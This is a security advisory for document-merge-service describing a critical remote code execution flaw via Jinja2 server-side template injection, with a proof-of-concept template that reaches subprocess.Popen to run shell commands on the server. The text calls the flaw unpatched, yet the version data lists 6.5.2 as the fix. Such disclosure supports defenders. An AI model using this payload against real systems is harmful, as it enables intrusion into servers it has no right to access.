GHSA-v5gf-r78h-55q6

Suggest an improvement
Source
https://github.com/advisories/GHSA-v5gf-r78h-55q6
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-v5gf-r78h-55q6/GHSA-v5gf-r78h-55q6.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-v5gf-r78h-55q6
Aliases
Published
2024-06-11T20:22:55Z
Modified
2024-06-12T19:33:05.271298Z
Severity
  • 9.9 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H CVSS Calculator
Summary
document-merge-service vulnerable to Remote Code Execution via Server-Side Template Injection
Details

Impact

What kind of vulnerability is it? Who is impacted?

A remote code execution (RCE) via server-side template injection (SSTI) allows for user supplied code to be executed in the server's context where it is executed as the document-merge-server user with the UID 901 thus giving an attacker considerable control over the container.

Patches

Has the problem been patched? What versions should users upgrade to?

It has not been patched.

References

Are there any links users can visit to find out more?

  • https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti

POC

Add the following to a document, upload and render it:

{% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %} 
ls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("ls -a", shell=True, stdout=-1).communicate()[0].strip() }}

whoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("whoami", shell=True, stdout=-1).communicate()[0].strip() }}

uname -a:
{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("uname -a", shell=True, stdout=-1).communicate()[0].strip() }}

{% endif %}

The index might be different, so to debug this first render a template with {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__() }} and then get the index of subprocess.Popen and replace 202 with that.

image

References

Affected packages

PyPI / document-merge-service

Package

Name
document-merge-service
View open source insights on deps.dev
Purl
pkg:pypi/document-merge-service

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
6.5.2

Affected versions

5.*

5.2.0
5.2.1

6.*

6.0.0
6.1.0
6.1.1
6.1.2
6.2.0
6.2.1
6.2.2
6.3.0
6.3.1
6.4.0
6.4.1
6.4.2
6.4.3
6.4.4
6.4.5
6.4.6
6.5.0
6.5.1